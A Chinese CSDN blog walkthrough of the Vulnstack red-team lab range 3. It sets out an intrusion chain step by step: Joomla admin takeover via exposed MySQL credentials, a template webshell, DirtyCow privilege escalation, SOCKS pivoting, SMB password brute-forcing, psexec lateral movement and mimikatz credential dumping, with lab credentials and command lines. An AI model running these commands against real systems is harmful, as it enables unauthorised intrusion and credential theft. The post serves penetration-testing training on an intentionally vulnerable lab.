ATT&CK实战系列-红队评估 (红日靶场3)Vulnstack三层网络域渗透靶场

最新推荐文章于 2024-03-22 15:30:00 发布
最新推荐文章于 2024-03-22 15:30:00 发布
阅读量976 收藏
点赞数
分类专栏: 红队打靶 文章标签: 网络 web安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_47289634/article/details/132021341
版权

文章目录

环境配置

靶场介绍

靶场地址

http://vulnstack.qiyuanxuetang.net/vuln/detail/5/

打开虚拟机镜像为挂起状态,第一时间进行快照,部分服务未做自启,重启后无法自动运行。

挂起状态,账号已默认登陆,centos为出网机,第一次运行,需重新获取桥接模式网卡ip。

除重新获取ip,不建议进行任何虚拟机操作。

参考虚拟机网络配置,添加新的网络,该网络作为内部网络。

注:名称及网段必须符合下面图片,进行了固定ip配置。

靶场设置

网络配置要求,攻击机kali为net8,外网的centos其中一个为net8,另一个net2
在这里插入图片描述

拓扑图(这里我的kali为192.168.1.5)

在这里插入图片描述

外网渗透

信息收集

端口扫描

使用nmap进行端口,服务,操作系统探测

nmap -sS -P0 -sV -O 192.168.1.110

得到目标开放了22,80和3306
在这里插入图片描述
访问一下目标的80端口,看到是个joomla CMS搭建的网站,脚本语言为php
在这里插入图片描述

目录扫描

dirb http://192.168.1.110/

发现目标存在admin目录
在这里插入图片描述
访问一下是个后台的登录界面,弱口令进不去
在这里插入图片描述

漏洞发现与利用

使用msf获取joomla cms相关信息

use auxiliary/scanner/http/joomla_version
set rhosts http://192.168.1.110/
run

得到具体版本,没啥用,不能利用
在这里插入图片描述
上御剑,扫一下后台,发现一大堆东西
phpinfo()
在这里插入图片描述
mysql配置信息
在这里插入图片描述
navicat远程连接mysql,看到管理员密码被加密了
在这里插入图片描述
这里可以根据官方文档,修改添加管理员账号密码
如何恢复或重置管理员密码?

这里注意表的名字改成你自己的
在这里插入图片描述

登录后台

http://192.168.1.103/administrator/index.php  admin2  secret

getshell

点击
extensions-->templates-->templates-->protostar details and files-->index.php-->save

写入蚁剑shell
在这里插入图片描述
连接成功
在这里插入图片描述
命令执行发现用不了,php开启了禁用函数
在这里插入图片描述
使用蚁剑插件绕过函数禁用
在这里插入图片描述

获取ssh账号密码,登录centos

看下目录里面有没有有用的信息,发现一个账号密码,前期信息收集知道开放了22端口,远程连接试一下
在这里插入图片描述
连接成功
在这里插入图片描述

提权

uname -r 发现linux内核版本很低,可以用脏牛提权

https://github.com/imust6226/dirtcow

靶机里vi dirty.c,直接将上面dirty.c里的内容复制进去,编译一下

gcc -pthread dirty.c -o dirty -lcrypt

在这里插入图片描述

./dirty 123456  ---执行exp

创建账户:firefart,密码:123456

切换到firefart账户,获取root权限
在这里插入图片描述

内网渗透

建立代理

掏出祖传的EW(earthworm),上传到靶机并执行,让靶机当做进入内网的跳板
在这里插入图片描述
kali里记得修改一下走靶机地址

vim /etc/proxychains.conf  //配置proxychains

将最后一行的socks4注释掉,添加下面的行,端口为跳板机上的ew监听的8888:

socks5  192.168.1.100 8888

内网信息收集

直接上神器fscan

在这里插入图片描述

由此可以看出:

已经拿到root权限的centos:有两张网卡 一张是192.168.216.131 一张是192.168.93.100

Nginx代理服务器ubantu:192.168.93.120

一台非TEST域内win7专业版主机:192.168.93.30

一台TEST域内win2008主机:192.168.93.20

一台TEST域控主机win server 2012:192.168.93.10

还跑出来了疑似的SSH账号,尝试登录发现不正确,挂代理尝试登录

smb暴破,获取本地管理员密码

这里我的字典里没有这个密码,我手动加上去的,20,30都是这个密码

use auxiliary/scanner/smb/smb_login
set rhosts 192.168.93.30
set smbuser administrator
set pass_file top10k.txt
run

暴破密码:administrator 123qwe!ASD
在这里插入图片描述

横向移动

使用psexec模块上线msf

use exploit/windows/smb/psexec
set rhost 192.168.93.30
set payload windows/meterpreter/bind_tcp
set smbuser administrator
set smbpass 123qwe!ASD
run

拿下win7
在这里插入图片描述
拿下win2008
在这里插入图片描述
接下来通过msf上传mimikatz,进行密码读取

#提升权限
privilege::debug

抓取密码
lsadump::lsa /patch

在这里插入图片描述

青衫木马牛
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
(14条消息) 红日安全vulnstack-ATT&CK实战系列 红队实战(一)_Ys3ter的博客-CSDN博客.html
05-27
(14条消息) 红日安全vulnstack-ATT&CK实战系列 红队实战(一)_Ys3ter的博客-CSDN博客.html
2021-10-17红日靶场3学习转发自pan墨森大佬(下错了虚拟机,joomla,ew代理,navicat,mysql远程登录渗透思路,dirtycow,bypass_disfunction))
qq_45290991的博客
10-17 680
vulstack红队评估(三) </h1> <div class="clear"></div> <div class="postBody"> <div id="cnblogs_post_body" class="blogpost-body blogpost-body-html"> 一、环境搭建...
ATT&CK红队评估红日靶场三)
weixin_45682839的博客
04-25 3380
ATT&CK红队评估红日靶场三)通关,拿下所有五台主机,包括:Centos、Ubantu、Windows xp、Windows 2008、Windows 2012
ATT&CK红队评估实战靶场(三)
zkaqlaoniao的博客
03-22 439
申明:本账号所分享内容仅用于网络安全技术讨论,切勿用于违法途径,所有渗透都需获取授权,违者后果自行承担,与本号及作者无关,请谨记守法。环境搭建、HTML,PHP,MySQL基础学习,信息收集,SQL注入,XSS,CSRF,暴力破解等等。使用msf上的psexec工具会出很多问题。帮助你在面试中脱颖而出。
ATT&CK实战系列-红队评估(三)WP
h1nt的博客
08-18 528
环境搭建 靶机下载地址 http://vulnstack.qiyuanxuetang.net/vuln/detail/5/ 将虚拟机下载下来后按照官方说明配置好网络环境即可开始测试 渗透流程 0x01 WEB信息收集 查看靶机WEB服务,发现是Joomla CMS搭建的demo站点 扫描目录得到配置文件的备份configuration.php~ 在其中翻到后端数据库的用户名和密码 同时端口扫描发现数据库服务可以外联 尝试用得到的账户密码登录,连接成功 0x02 添加管理员账
01 ATT&CK红队评估
qq_52671379的博客
07-19 336
01 ATT&CK红队评估
ATT&CK红队评估红日靶场二)
weixin_45682839的博客
04-11 2683
靶场搭建 靶场下载地址:漏洞详情 一共有三台主机:WEB、DC、PC WEB主机有两张网卡,第一张网卡NAT,第二张网卡选择一个仅主机模式的网络(vmvare可以通过编辑里的虚拟网络编辑器进行添加或修改网络)这里我选择的是创建的仅主机vmnet15网络 DC主机只有一张网卡,选择和WEB第二章网卡一样的vmnet15网络 PC有两张网卡,配置和WEB主机一样,第一张网卡NAT,第二张网卡vmnet15 网络设置完成后进行开机 WEB主机以administrator第一次登录时没
ATT&CK红队评估红日靶场一)
weixin_45682839的博客
03-10 1328
靶场搭建 下载地址:漏洞详情 虚拟网络编辑器新建一个仅主机模式的网络,子网地址改成192.168.52.0(也可以不用新建,但是必须是仅主机模式) 将windows2003和windows2008两台主机都设置为自定义VMnet16 windows7配置 攻击主机kali配置 kali和win7的第二个网卡可以在同一个自定义仅主机模式网段下,也可以同在NAT下 设置好之后,win7主机开启phpsyudy,配置就完成了 win7 内网网段192.168.52.
内网渗透实战——红日ATT&CK系列靶场(一)学习笔记_红日靶场1攻略-CSDN博客.html
最新发布
05-11
内网渗透实战——红日ATT&CK系列靶场(一)学习笔记_红日靶场1攻略-CSDN博客.html
ATT&CK中文手册.zip
11-24
一、Initial Access(入口点) 二、Execution(命令执行) 三、Persistence(持久化) 四、Privilege Escalation(权限提升) 五、Defense Evasion(绕过防御) 六、Credential Access(获取凭证) 七、Discovery(基础信息收集) ...
基于ATT&amp;CK安全能力评估与改进实践.pdf
08-08
通过安全大脑赋能,它可全面评估客户安全设备的整体防护能力,包括网络侧流量检测设备,邮件过滤设备等,也包括终端侧的查杀和沙箱等设备;此外,入侵者模拟可在客户授权的情况下,透过资产暴露的攻击面,进行实网...
ATT&CK红队评估红日靶场四)
weixin_45682839的博客
04-28 5303
ATT&CK红队评估红日靶场四)通关攻略,涉及知识包括: Struts2漏洞利用、phpmyadmin getshell、tomcat 漏洞利用、ms17_010、docker逃逸、ms14_068、ssh密钥利用、流量转发、横向移动、内网渗透等。
红日安全靶场3
weixin_48169878的博客
07-13 4047
环境准备 1、所有虚拟机已经自动挂起。且内网网段为192.168.93.0\24,外网网段为dhcp,不需要更改2、修改VMnet2的ip为192.168.93.0网段,没有就创建。因为校园网问题,桥接模式无法上网,为了方便,外网网卡改为net模式,并配置192.168.1.0网段,如下所示:修改kail的ip以及dns扫出来......
红日靶场系列ATT&CK红队评估1
weixin_45632448的博客
07-06 2650
内网渗透学习过程,简单记录一下靶场下载地址: 今天做的是第一个ATT&CK实战系列——红队实战(一)下载下来之后一共有三个虚拟机,解压到虚拟机目录下 分别对应的是Windows7,Windows Server 2003和Windows Server 2008。另外我们还需要一台攻击机,这里选用的是kali2022.1(其实真实环境自己主机就相当于攻击机),网络拓扑图如下所示: 靶场提供的三个主机在同一个网段中,另外Win7主机有两张网卡,模拟可以与外网进行通信的主机,且安装有phpstudy,部署了we
红日靶场系列ATT&CK红队评估3
weixin_45632448的博客
09-14 1188
IPC(Internet Process Connection)是共享“命名管道”的资源,它是为了让进程间通信而开放的命名管道,可以通过验证用户名和密码获得相应的权限,在远程管理计算机和查看计算机的共享资源时使用。连接成功,这里虽然找到了管理员的账号密码,但是密码是被加密的,而加密方式也并不知道(其实一般的网站后台账号的加密方式是MD5,这种的就可以直接将“123456”进行加密把他的替换掉,就可以登陆了,前提是要备份一下他原先的密码;但是这种就不能使用这种方式了)
VulnStack-ATT&CK-3(红日靶场三)
buffedon的博客
07-12 8296
VulnStack-ATT&CK-31. 环境配置2. 信息收集目标机端口扫描目录扫描3. 漏洞利用远程连接web的MySQL登录后台写一句话木马连接木马文件getshell4. 内网渗透内网信息收集脏牛漏洞提权内网渗透,建立监听路由转发Sock代理Socks5代理5. 横向移动NTLM Relay 攻击定位管理员meterpreter的kiwi模块抓取密码使用获取到的密码控制 win7进攻控(win 2012)6. 问题总结 1. 环境配置 此图仅供参考,IP地址有误 首先添加一张网卡(仅主
ATT&CK红队评估实战靶场-1(全网最细)
lwwzyy
12-20 3604
声明:该系列文章首发于公众号:纁玄安全,转载请注明出处!本公众号所分享内容仅用于网安爱好者之间的技术讨论,所有渗透及工具的使用都需获取授权,禁止用于违法途径,否则需自行承担,本公众号及作者不承担相应的后果。 ATT&CK红队评估实战靶场-1 目录: 1. 环境配置 插播一点网络配置的姿势 2. 实战 2.1 信息收集 2.2 web站点探测 2.3 getshell 3 漏洞 3.1 目录遍历漏洞 3.2 存储型XSS 4. ..
ATT&CK实战系列-红队评估(三)
weixin_51801534的博客
12-29 3510
注:遇到问题不要急,上网搜一搜,多试几个搜索引擎 外网信息收集 我们首先对已知的IP(192.168.1.110)进行端口扫描: ┌──(root????kali)-[~/桌面] └─# nmap -T4 -sC -sV 192.168.1.110 如上图所示,发现Centos上面开放了22、80、和3306端口,分别运行着OpenSSH、nginx和MySQL, 访问80端口,发现是一个Joomla CMS搭建的站点 Joomla是一套全球知名的内容管理系统,是使用PHP语言加上MySQL数据库所开
ATT\\\\&CK红队评估实战靶场
08-16
抱歉,我无法回答这个问题。我只能在提供的引用内容范围内提供答案。请您提供与红日靶场相关的引用内容,我将尽力为您提供答案。谢谢!<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *2* [ATT&CK红队评估实战靶场(二)](https://blog.csdn.net/qq_53263789/article/details/115282950)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}}] [.reference_item style="max-width: 50%"] - *3* [Windows系统——ATT&CK红队评估实战靶场(二)——CS方式](https://blog.csdn.net/qq_44029310/article/details/126039321)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

青衫木马牛

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值